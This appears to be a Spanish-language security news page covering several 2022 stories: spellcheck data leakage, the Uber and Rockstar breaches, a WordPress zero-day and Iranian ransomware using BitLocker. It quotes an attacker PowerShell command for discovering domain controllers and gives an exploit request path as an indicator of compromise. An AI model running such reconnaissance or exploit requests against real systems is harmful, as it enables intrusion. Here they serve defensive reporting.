Las funciones extendidas de revisión ortográfica en los navegadores web Google Chrome y Microsoft Edge transmiten datos de formulario, incluida información de identificación personal (PII) y, en algunos casos, contraseñas, a Google y Microsoft respectivamente.

Si bien esta puede ser una función conocida e intencionada de estos navegadores web, genera inquietudes sobre lo que sucede con los datos después de la transmisión y qué tan segura podría ser la práctica, particularmente cuando se trata de campos de contraseña.

Tanto Chrome como Edge se envían con correctores ortográficos básicos habilitados. Sin embargo, características como el corrector ortográfico mejorado de Chrome o el editor de Microsoft, cuando el usuario las habilita manualmente, presentan este riesgo potencial para la privacidad.

Spell-jacking: Ese es su corrector ortográfico enviando PII a Big Tech

En caso de que se activen las funciones mejoradas de revisión ortográfica, los datos de su formulario se transmiten a Google y Microsoft, respectivamente. Según el sitio web que visite, los datos del formulario pueden incluir PII, incluidos, entre otros, Números de Seguro Social (SSN)/Números de Seguro Social (SIN), nombre, dirección, correo electrónico, fecha de nacimiento (DOB), información de contacto, información bancaria y de pago, y así sucesivamente.

Josh Summitt, cofundador y director de tecnología de la empresa de seguridad de JavaScript otto-js, descubrió este problema mientras probaba la detección de comportamientos de secuencias de comandos de su empresa.

En los casos en los que Chrome Enhanced Spellcheck o Edge's Microsoft Editor (spellchecker) esten habilitados, "básicamente cualquier cosa ingresada en los campos de formulario de estos navegadores se transmitía a Google y Microsoft. Además, si hace clic en 'Mostrar contraseña', el corrector ortográfico mejorado incluso envía su contraseña", explica en una publicación.

Para demostrarlo, otto-js compartió el ejemplo de un usuario que ingresa sus credenciales en la plataforma Cloud de Alibaba en el navegador web Chrome, aunque se puede usar cualquier sitio web para esta demostración.

Con el corrector ortográfico mejorado habilitado, y suponiendo que el usuario haya tocado la función "mostrar contraseña", los campos del formulario, incluidos el nombre de usuario y la contraseña, se transmiten a Google en googleapis.com.

La compañía también ha compartido un video de demostración:

BleepingComputer también observó que las credenciales se transmitían a Google al visitar sitios importantes como:

  • CNN: tanto el nombre de usuario como la contraseña cuando se usa 'mostrar contraseña'
  • Facebook.com: nombre de usuario y contraseña al usar 'mostrar contraseña'
  • SSA.gov (Inicio de sesión del Seguro Social): solo campo de nombre de usuario
  • Bank of America: solo campo de nombre de usuario
  • Verizon: solo campo de nombre de usuario

Solución HTML simple: 'spellcheck=false'

Aunque la transmisión de los campos del formulario se realiza de forma segura a través de HTTPS, es posible que no esté muy claro qué sucede con los datos del usuario una vez que llegan al tercero, en este ejemplo, el servidor de Google.

"La función de revisión ortográfica mejorada requiere una aceptación por parte del usuario", confirmó un portavoz de Google a BleepingComputer. Tenga en cuenta que esto contrasta con el corrector ortográfico básico que está habilitado en Chrome de forma predeterminada y no transmite datos a Google.

Para revisar si el corrector ortográfico mejorado está habilitado en su navegador Chrome, copie y pegue el siguiente enlace en su barra de direcciones. A continuación, puede optar por activarlo o desactivarlo:

  chrome://settings/?search=Enhanced+Spell+Check

"El texto escrito por el usuario puede ser información personal confidencial y Google no lo adjunta a ninguna identidad de usuario y solo lo procesa en el servidor temporalmente. Para garantizar aún más la privacidad del usuario, trabajaremos para excluir las contraseñas de manera proactiva del corrector ortográfico" continuó Google en su declaración.

En cuanto a Edge, Microsoft Editor Spelling & Grammar Checker es un complemento del navegador que debe instalarse explícitamente para que se produzca este comportamiento.

En respuesta al informe de otto-js, tanto AWS como LastPass mitigaron el problema. En el caso de LastPass, se llegó al remedio agregando un simple atributo HTML Spellcheck="false" al campo de la contraseña. Un campo de entrada con 'corrector ortográfico' establecido explícitamente en falso no se procesará a través del corrector ortográfico de un navegador web.

Irónicamente, observamos que el formulario de inicio de sesión de Twitter, tiene el atributo HTML "spellcheck" del campo de contraseña establecido explícitamente en True:

Como protección adicional, los usuarios de Chrome y Edge pueden desactivar el corrector ortográfico mejorado (siguiendo los pasos mencionados anteriormente) o eliminar el complemento Microsoft Editor de Edge hasta que ambas compañías hayan revisado los correctores ortográficos extendidos para excluir el procesamiento de campos confidenciales, como contraseñas.

Fuente: BC

19 sept 2022

Propuesta de Anteproyecto de Ley de Protección de Datos Personales (Actualización Ley 25.326)

CONSIDERANDO:

Que el derecho a la protección de los datos personales en la República Argentina es reconocido a través del artículo 43 de la Constitución Nacional donde establece que: "Toda persona podrá interponer esta acción [expedita y rápida de amparo] para tomar conocimiento de los datos a ella referidos y de su finalidad, que consten en registros o bancos de datos públicos, o los privados destinados a proveer informes, y en caso de falsedad o discriminación, para exigir la supresión, rectificación, confidencialidad o actualización de aquéllos. No podrá afectarse el secreto de las fuentes de información periodística".

...

LA DIRECTORA DE LA AGENCIA DE ACCESO A LA INFORMACIÓN PÚBLICA

RESUELVE:

ARTÍCULO 1º.- Ábrase el Procedimiento de Elaboración Participativa de Normas, conforme lo establecido en el Reglamento General para la Elaboración Participativa de Normas, aprobado por el artículo 3° del Decreto Nº 1172/03 (Anexo V) en relación con la propuesta de Anteproyecto de Ley de Protección de Datos Personales, que como Anexo I (IF-2022-94737490-APN-AAIP) integra la presente Resolución, formándose el expediente administrativo conforme lo dispuesto por el artículo 12 del Decreto Nº 1172/03.

Se adjunta en archivo, propuesta de anteproyecto de Actualización Ley 25.326.

CAPÍTULO 1 - DISPOSICIONES GENERALES

ARTÍCULO 1°. - Objeto

La presente Ley tiene por objeto garantizar el ejercicio del derecho fundamental de las personas humanas a la protección de sus datos personales y su privacidad, de conformidad a lo establecido en el artículo 43, párrafo tercero, de la CONSTITUCIÓN NACIONAL, los convenios internacionales sobre protección de datos personales y los tratados de derechos humanos en los que la REPÚBLICA ARGENTINA sea parte.

Esta Ley establece las reglas para el debido tratamiento de los datos personales y la autodeterminación informativa, así como los derechos de las personas humanas y los deberes de quienes realizan su tratamiento.

  • CAPÍTULO 1 - DISPOSICIONES GENERALES
  • CAPÍTULO 2 - TRATAMIENTO DE DATOS PERSONALES
  • CAPÍTULO 3 - TRANSFERENCIAS INTERNACIONALES
  • CAPÍTULO 4 - DERECHOS DE LOS TITULARES DE LOS DATOS
  • CAPÍTULO 5 - OBLIGACIONES DE LOS RESPONSABLES Y ENCARGADOS DEL TRATAMIENTO
  • CAPÍTULO 6 - PROTECCIÓN DE DATOS DE INFORMACIÓN CREDITICIA
  • CAPÍTULO 7 - AUTORIDAD DE APLICACIÓN
  • CAPÍTULO 8 - PROCEDIMIENTOS Y SANCIONES
  • CAPÍTULO 9 - ACCIÓN DE HABEAS DATA
  • CAPÍTULO 10 - DISPOSICIONES TRANSITORIAS 
  • CAPÍTULO 11 - DISPOSICIONES FINALES

Fuente: Boletin Oficial | Infoleg

Hackean RockStar y roban código fuente de GTA 5 y 6

Aparentemene el mismo atacante de 18 años que hace apenas unos días hackeó a UBER por diversión, ahora ha reivindicado el ataque a RockStar en el foro GTA Forums con el usuario "teapotuberhacker".

En el hackeo afirma haber robado el código fuente de GTA 5 y 6, además de filtrar en el foro GTAForums 90 vídeos reales del juego. RockStar está haciendo un esfuerzo tremendo borrando los vídeos subidos Youtube, Mega, Telegram, Twitter, Instagram, etc. Aún así, los vídeos están tan compartidos que siguen apareciendo especialmente en Telegram. El atacante parece que uso el mismo modus operandi que con Uber, accediendo al servidor Slack (utilizando los credenciales robados de un trabajador) y también a la Wiki de Confluence.

La cuenta de Telegram del atacante fue borrada ayer por la noche, así como numerosos canales de Telegram donde estaban filtrando los vídeos.

Los vídeos y parte del código fuente se filtraron por primera vez en GTAForums ayer, donde un actor de amenazas llamado "teapotuberhacker" compartió un enlace a un archivo "videos.RAR" que contiene 90 vídeos robados. El mensaje original fue eliminado y hoy ha sido restaurado pero eliminando todo el material, enlaces, imágenes del código fuente, de los vídeos, etc.

Los vídeos parecen haber sido creados por los desarrolladores para depurar algunas características del juego, tales como los ángulos de la cámara, el seguimiento de los NPC y las localizaciones de Vice City. Además, algunos de los vídeos contienen conversaciones habladas entre el protagonista y otros NPC.

Después de que los miembros del foro mostraran su incredulidad de que el hackeo fuera real, el ciberdelincuente afirmó que estaba detrás del reciente ciberataque a Uber y ha filtrado capturas de pantalla del código fuente tanto de Grand Theft Auto V como de Grand Theft Auto 6 como prueba adicional.

Rockstar Games comprometido

El ciberdelincuente afirma haber robado "el código fuente y los activos de GTA 5 y 6, la versión de prueba de GTA 6", pero está intentando extorsionar a Rockstar Games para evitar que se publiquen más datos. Por ese motivo, dice que está aceptando ofertas de más de 10.000 dólares por el código fuente y los activos de GTA V, pero no está vendiendo el código fuente de GTA 6 de momento, aunque ha hecho público que podría hacerlo.

Aunque Rockstar Games no ha emitido declaración oficial de momento, Jason Schreier, de Bloomberg, ha confirmado que la filtración es válida después de hablar con fuentes de Rockstar.

Desde entonces, los vídeos filtrados han llegado a YouTube y Twitter, y Rockstar Games ha emitido avisos de infracción de la DMCA y solicitudes de retirada para que los vídeos sean eliminados de las distintas plataformas.

Los vídeos filtrados en los que aparece un personaje jugable femenino se alinean con la información que hasta ahora teníamos sobre GTA VI. En julio Bloomberg avanzó que el título iba a tener dos protagonistas y que uno de ellos iba a ser una mujer latina llamada Lucia.

El protagonista masculino aparece con una camiseta negra o sin mangas. La historia de ambos personajes está influenciada por Bonnie y Clyde. Por otro lado, hay clips donde vemos Vice City Metro, lo que nos indica que GTA VI se ambienta en una versión ficticia de Miami como GTA: Vice City.

Fuente: Derecho de la Red | ElHacker

17 sept 2022

Más de 280.000 sitios de WordPress atacados usando Zero-Day del complemento WPGateway

Una falla de día cero en la última versión de un complemento premium de WordPress conocido como WPGateway se está explotando activamente en la naturaleza, lo que podría permitir que los actores malintencionados se apoderen por completo de los sitios afectados.

Registrado como CVE-2022-3180 (puntaje CVSS: 9.8), el problema se está armando para agregar un usuario administrador malicioso a los sitios que ejecutan el complemento WPGateway, señaló la empresa de seguridad de WordPress, Wordfence.

"Parte de la funcionalidad del complemento expone una vulnerabilidad que permite a los atacantes no autenticados insertar un administrador malicioso", dijo Ram Gall, investigador de Wordfence, en un aviso.

WPGateway se factura como un medio para que los administradores del sitio instalen, respalden y clonen complementos y temas de WordPress desde un tablero unificado.

El indicador más común de que un sitio web que ejecuta el complemento se ha visto comprometido es la presencia de un administrador con el nombre de usuario "rangex". Además, la aparición de solicitudes a "/wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1" en los registros de acceso es una señal de que el sitio de WordPress ha sido atacado utilizando la falla, aunque no implica necesariamente una violación exitosa.

Wordfence dijo que bloqueó más de 4,6 millones de ataques que intentaron aprovechar la vulnerabilidad contra más de 280.000 sitios en los últimos 30 días.

Se han retenido más detalles sobre la vulnerabilidad debido a la explotación activa y para evitar que otros actores se aprovechen de la deficiencia. En ausencia de un parche, se recomienda a los usuarios que eliminen el complemento de sus instalaciones de WordPress hasta que haya una solución disponible.

El desarrollo se produce días después de que Wordfence advirtiera sobre el abuso en la naturaleza de otra falla de día cero en un complemento de WordPress llamado BackupBuddy.

La divulgación también llega cuando Sansec reveló que los actores de amenazas irrumpieron en el sistema de licencias de extensión de FishPig, un proveedor de integraciones populares de Magento-WordPress, para inyectar un código malicioso diseñado para instalar un troyano de acceso remoto llamado Rekoobe.

Fuente: THN

16 sept 2022

Uber hackeado, sistemas internos y documentos confidenciales presuntamente comprometidos

Uber sufrió el jueves un ciberataque, los atacantes pudieron penetrar en su red interna y acceder a documentos internos, incluidos informes de vulnerabilidad.

Según el New York Times, los atacantes hackearon la cuenta de Slack de un empleado y la usaron para informar al personal interno que "la empresa había sufrido una violación de datos" y proporcionaron una lista de bases de datos internas presuntamente pirateadas.

"Anuncio que soy un hacker y Uber ha sufrido una violación de datos", afirma el mensaje.

La empresa se vio obligada a desconectar sus sistemas internos de comunicaciones e ingeniería para mitigar el ataque e investigar la intrusión.

Los atacantes supuestamente comprometieron varios sistemas internos y proporcionaron imágenes de correo electrónico, almacenamiento en la nube y repositorios de códigos a The New York Times y algunos investigadores de seguridad cibernética.

"Prácticamente tienen acceso completo a Uber", dijo Sam Curry, un ingeniero de seguridad de Yuga Labs que mantuvo correspondencia con la persona que afirmó ser responsable de la violación. "Este es un compromiso total, por lo que parece".

Los atacantes también tenían acceso al programa de recompensas de HackerOne de la empresa, lo que significa que tenían acceso a todos los informes de errores enviados a investigadores de seguridad y esta información es muy importante porque los actores de amenazas podrían usarla para lanzar más ataques. En este momento no es posible descartar que los informes incluyan detalles técnicos sobre algunas fallas que aún no han sido reparadas por la empresa.

HackerOne ha deshabilitado inmediatamente el programa de recompensas por errores de Uber bloqueando cualquier acceso a la lista de problemas informados. El atacante afirma haber comprometido completamente a Uber y ha publicado capturas de pantalla de las siguientes plataformas:

  • Slack
  • Google Workspace (admin)
  • Cuentas de AWS
  • HackerOne (admin)
  • SentinelOne EDR
  • VMware vSphere
  • Dashboards Financieros

"No tenemos una estimación en este momento de cuándo se restablecerá el acceso completo a las herramientas, así que gracias por su paciencia", dijo Latha Maripuri, directora de seguridad de la información de Uber, a NYT por correo electrónico.

Se instruyó a los empleados para que no usaran el servicio de mensajería interna Slack y algunos de ellos, hablando bajo condición de anonimato, dijeron al NYT que otros sistemas internos eran inaccesibles.

El atacante dice tener 18 años y agregó que Uber tenía poca seguridad, en el mensaje enviado a través de Slack también dijo que los conductores de Uber deberían recibir un pago más alto. Esta no es la primera vez que la empresa sufre una brecha de seguridad. En 2017, la noticia de otra filtración de datos que tuvo lugar en 2016 fue noticia.

En otra imagen compartida, se muestran algunas de las credenciales a las que el atacante tuvo acceso, incluso se filtraron las credenciales de la "Cuenta de servicio de respuesta de seguridad". Para aquellos que no saben qué son las cuentas de este estilo, se utilizan durante emergencias críticas, como una brecha de seguridad importante.

En noviembre de 2017, el CEO de Uber, Dara Khosrowshahi, anunció que los delincuentes informáticos irrumpieron en la base de datos de la empresa y accedieron a los datos personales (nombres, direcciones de correo electrónico y números de teléfono celular) de 57 millones de sus usuarios, la revelación desconcertante fue que la empresa encubrió el hackeo durante más de un año.

Los atacantes accedieron también a los nombres y números de licencia de conducir de aproximadamente 600.000 de sus conductores en los Estados Unidos.

El hackeo ocurrió en 2016, fue fácil para los atacantes que según un informe publicado por Bloomberg, obtuvieron credenciales de un sitio privado de GitHub utilizado por el equipo de desarrollo de la empresa. Los delincuentes informáticos intentaron chantajear a Uber y exigieron 100.000 dólares a la empresa a cambio de evitar la publicación de los datos robados.

En lugar de notificar la violación de datos a los clientes y a las fuerzas del orden, como exige la ley de notificación de violaciones de seguridad de datos de California, el jefe de seguridad de la información, Joe Sullivan, ordenó pagar el rescate y cubrir la historia destruyendo cualquier evidencia. El pago se disfrazó como un premio de recompensa por errores completo con acuerdos de confidencialidad firmados.

¿Datos personales comprometidos?

La empresa de viajes ha informado que "no hay evidencia" de que el perpetrador haya accedido a datos confidenciales de los usuarios, como los historiales de viajes, datos personales o de las tarjetas. Todos los servicios funcionan correctamente y la empresa ha restablecido el uso del software interno que eliminó al descubrir la infracción.

Fuente: SecurityAffairs

Europa confirma una multa a Google de €4.125 millones por imponer "su Android" a los fabricantes

El Tribunal General Europeo confirma en gran parte la decisión de la Comisión que declaró que Google había impuesto restricciones ilegales a los fabricantes de dispositivos móviles Android y a los operadores de redes móviles con el propósito de consolidar la posición dominante de su motor de búsqueda.

En el año 2018 una multa histórica por parte de la Unión Europea al gigante de Google por un valor de 4.343 millones de euros, superando la famosa multa de 2.420 millones de euros de 2017. Tras un largo proceso de recursos por parte de Google, finalmente la justicia europea no les ha dado la razón confirmando la sanción, aunque rebajándola varios millones hasta los 4.125 millones de euros.

Google ha abusado de su posición dominante, ya que impuso restricciones contractuales anticompetitivas a los fabricantes de dispositivos móviles y a los operadores, que tenían como objetivo proteger y reforzar su posición en el ámbito de los servicios de búsqueda general.

La multa llegó directamente desde la Comisión Europea por impedir a los consumidores beneficiarse de una competencia efectiva en un ámbito tan importante como el móvil. Esto se traduce en que Google impone a los fabricantes que quieren hacer uso de Android de manera plena a cumplir diferentes requisitos. De esta manera se pasa a tener una posición completamente dominante, no dejando la libertad necesaria a los usuarios para poder disfrutar de una competencia real.

Para poder afirmar esto, la Comisión Europea afirmó que Google obliga siempre a los fabricantes a preinstalar Google Search y Google Chrome en los dispositivos si se quiere tener la Play Store en los dispositivos con la correspondiente licencia. Además, también se han demostrado diferentes pagos de Google a los fabricantes para tener instaladas en los dispositivos de manera exclusiva la aplicación Google.

La Comisión Europea comenzó a indagar sobre las prácticas comerciales de Google en 2013 y cinco años más tarde anunció la sanción por el abuso de su posición dominante. Tras un largo proceso de recursos por parte de Google a la sanción impuesta, finalmente la justicia europea no les ha dado la razón confirmando la sanción, aunque se ha rebajado hasta los 4.125 millones de euros.

Google también ha impedido a los fabricantes a utilizar versiones adaptadas de Android sin que tengan su aprobación. En el caso de hacerlo, no tendrían el derecho a emplear los servicios y las aplicaciones de Google de manera libre. Esto es claramente una práctica de monopolio que ata a los fabricantes a usar la misma versión de Android base si quieren ofrecer los servicios de Google que son muy reclamados por los usuarios.

El TGUE, así, "estima que procede reformar la decisión impugnada a los efectos de fijar el importe de la multa que ha de imponerse a Google por la infracción cometida en 4.125 millones de euros. A tal fin, al igual que la Comisión, el Tribunal considera adecuado tomar en consideración el carácter deliberado de la aplicación de las prácticas infractoras y el valor de las ventas pertinentes realizadas por Google en el último año de su participación completa en la infracción. En cambio, por lo que atañe a la consideración de la gravedad y de la duración de la infracción, el Tribunal estima adecuado, por las razones expuestas en la sentencia, tener en cuenta la evolución en el tiempo de los distintos aspectos de la infracción y la complementariedad de las prácticas en cuestión para evaluar el impacto de los efectos de expulsión constatados fundadamente por la Comisión en la decisión impugnada".

La Comisión Europea también impuso que Google debía acabar con estas prácticas. Se espera de esta manera que Android tenga una competencia real en el mercado sin que existan trabas a la hora de emplear las aplicaciones de Google. De esta manera, en un futuro se explora la necesidad de reducir la cuota de mercado que puede llegar a tener Android en Europa con la libertad de los fabricantes para crear nuevos sistemas operativos.

Fuentes: El Mundo | Derecho de la Red | Genbeta

14 sept 2022

Operaciones de ransomware utilizan BitLocker

El equipo de inteligencia de amenazas de Microsoft asegura que el grupo DEV-0270 (también conocido como Nemesis Kitten o Phosphorus) ha estado abusando de la función BitLocker de Windows en sus ataques y la ha usado para cifrar los datos de los discos de sus víctimas con la posterior petición de rescate a las mismas.

Los analistas de Microsoft comentan que los atacantes aprovechan cada vez más los LOLBINs (Living Off the Land Binaries), una técnica que se basa en aprovecharse de binarios propios del sistema para ocasionar un importante daño en un ataque, con una tasa de detección relativamente baja) en sus ataques.

En este caso concreto se usa BitLocker, una función de protección de datos que proporciona cifrado de volumen completo en dispositivos que ejecutan Windows 10, Windows 11 o Windows Server 2016 y superior. Según la investigación, el grupo utiliza DiskCryptor, un sistema de cifrado de disco de código abierto para Windows que permite el cifrado completo del disco duro de un dispositivo.

Desde el acceso de los atacantes a los equipos hasta la aparición de la nota de rescate de los equipos bloqueados pasaron aproximádamente dos días y en las notas se exige el pago de la cantidad de 8.000 dólares a cambio de las claves de desbloqueo de la información.

Para el descubrimiento de controladores de dominio, los atacantes hacen uso de los siguientes comandos de PowerShell y WMI:

"powershell.exe" /c Get-WMIObject Win32_NTDomain | findstr DomainController
"findstr.exe" DomainController

Microsoft dice que este grupo de atacantes es una división del grupo "Phosphorus" respaldado por Irán (conocido también como Charmin Kitten y APT35) conocios por dirigir sus ataques a víctimas de alto perfil vinculadas a gobiernos, ONGs y organizaciones de defensa de todo el mundo.

El grupo DEV-0270 está siendo operado por una empresa iraní conocida bajo dos alias: Secnerd (secnerd[.]ir) y Lifeweb (lifeweb[.]it).

Estas organizaciones también están vinculadas a Najee Technology Hooshmand (ناجی تکنولوژی هوشمند), ubicada en Karaj, Irán, según las investigaciones.

El grupo suele ser oportunista en su orientación: escanean Internet para encontrar servidores y dispositivos, lo que hace que las organizaciones con servidores y dispositivos vulnerables y detectables sean susceptibles a estos ataques.

Dado que muchos de los ataques de DEV-0270 han explotado vulnerabilidades conocidas en Exchange (ProxyLogon) o Fortinet (CVE-2018-13379), se recomienda a las empresas parchear sus servidores y equipos para bloquear los intentos de explotación y los posteriores ataques de ransomware.

Para estos casos, herramientas como SANA (Servicio de Análisis, Notificaciones y Alertas de seguridad), creada por Hispasec, ayudan a las empresas a monitorizar y gestionar las potenciales vulnerabilidades de sus sistemas.

Fuente: Microsoft

Microsoft parchea 64 nuevas vulnerabilidades, incluidas cinco críticas

Ayer martes, Microsoft reveló 64 vulnerabilidades, incluidas cinco críticas y una que está siendo explotada. Las vulnerabilidades críticas afectan a Microsoft Dynamics 365, las extensiones de protocolo de intercambio de claves de Internet (IKE) de Windows y TCP/IP de Windows.

Los parches publicados abordan vulnerabilidades en Microsoft Windows y en sus componentes; Azure y Azure Arc; .NET y Visual Studio y .NET Framework; Microsoft Edge (basado en Chrome); Office y sus Componentes; Windows Defender; y en el núcleo de Linux.

Como señala Zero Day Initiative, esto se suma a 15 parches para CVE en Microsoft Edge (basado en Chromium) y un parche en procesadores ARM.

El CVE-2022-37969 afecta al controlador del sistema de archivos de registro comunes de Windows. Para explotarlo, el atacante ya debe tener acceso al sistema y la capacidad de ejecutar código. Esta vulnerabilidad le permite al atacante obtener nuevos privilegios.

"Los errores de esta naturaleza a menudo se envuelven en algún tipo de ataque de ingeniería social, como convencer a alguien para que abra un archivo o haga clic en un enlace", señala Zero Day Initiative. "Una vez que lo hacen, se ejecuta código adicional con privilegios elevados para tomar el control del sistema".

Microsoft reconoció a los investigadores de DBAPPSecurity, Mandiant, CrowdStrike y Zscaler por identificar esta vulnerabilidad.

Los cinco CVE críticos revelados el martes fueron todas vulnerabilidades de ejecución remota de código (RCE). De ellos, dos afectan las versiones locales de Microsoft Dynamics CRM on-premises. Estos CVE permiten que un usuario autenticado ejecute un paquete de solución de confianza especialmente diseñado para ejecutar comandos SQL arbitrarios. Desde allí, el atacante podría escalar y ejecutar comandos como db_owner dentro de su base de datos de Dynamics 365.

Otros dos CVE críticos CVE-2022-34721 y CVE-2022-34722 afectan las extensiones de protocolo de intercambio de claves de Internet (IKE) de Windows, lo que permite que un atacante no autenticado envíe un paquete IP especialmente diseñado a una máquina de destino. Pueden ejecutarse desde la red sin necesidad de interactuación por parte de la víctima.

* 2 ya conocidos, uno en .NET y otro el que está ya siendo aprovechado por atacantes (a continuación).

* Uno aprovechado por atacantes que se trata de una elevación de privilegios en el driver Windows Common Log File (CVE-2022-37969)

* 15 errores en Chromium.

El último CVE crítico CVE-2022-34718 afecta a Windows TCP/IP, lo que permite que un atacante no autenticado envíe un paquete IPv6 especialmente diseñado a un nodo de Windows donde IPSec está habilitado.

Fuente: href="https://www.zdnet.com/article/microsoft-patch-tuesday-64-new-vulnerabilities-including-five-critical-ones/" rel="nofollow" target="_blank">ZDNet